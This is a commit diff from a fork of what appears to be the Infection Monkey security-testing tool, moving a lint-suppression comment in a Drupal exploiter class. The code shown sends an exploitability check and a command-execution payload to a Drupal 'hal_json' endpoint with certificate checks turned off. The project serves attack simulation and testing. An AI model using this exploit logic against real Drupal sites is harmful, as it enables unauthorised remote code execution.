forked from p15670423/monkey
move noqa to the invocation line
This commit is contained in:
parent
e69ff81e6f
commit
658a744c5a
|
@ -72,10 +72,10 @@ class DrupalExploiter(WebRCE):
|
||||||
"""
|
"""
|
||||||
payload = build_exploitability_check_payload(url)
|
payload = build_exploitability_check_payload(url)
|
||||||
|
|
||||||
response = requests.get(f'{url}?_format=hal_json',
|
response = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
|
||||||
json=payload,
|
json=payload,
|
||||||
headers={"Content-Type": "application/hal+json"},
|
headers={"Content-Type": "application/hal+json"},
|
||||||
verify=False) # noqa: DUO123
|
verify=False)
|
||||||
|
|
||||||
if is_response_cached(response):
|
if is_response_cached(response):
|
||||||
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
|
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
|
||||||
|
@ -89,10 +89,10 @@ class DrupalExploiter(WebRCE):
|
||||||
base = remove_port(url)
|
base = remove_port(url)
|
||||||
payload = build_cmd_execution_payload(base, cmd)
|
payload = build_cmd_execution_payload(base, cmd)
|
||||||
|
|
||||||
r = requests.get(f'{url}?_format=hal_json',
|
r = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
|
||||||
json=payload,
|
json=payload,
|
||||||
headers={"Content-Type": "application/hal+json"},
|
headers={"Content-Type": "application/hal+json"},
|
||||||
verify=False) # noqa: DUO123
|
verify=False)
|
||||||
|
|
||||||
if is_response_cached(r):
|
if is_response_cached(r):
|
||||||
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
||||||
|
|
Loading…
Reference in New Issue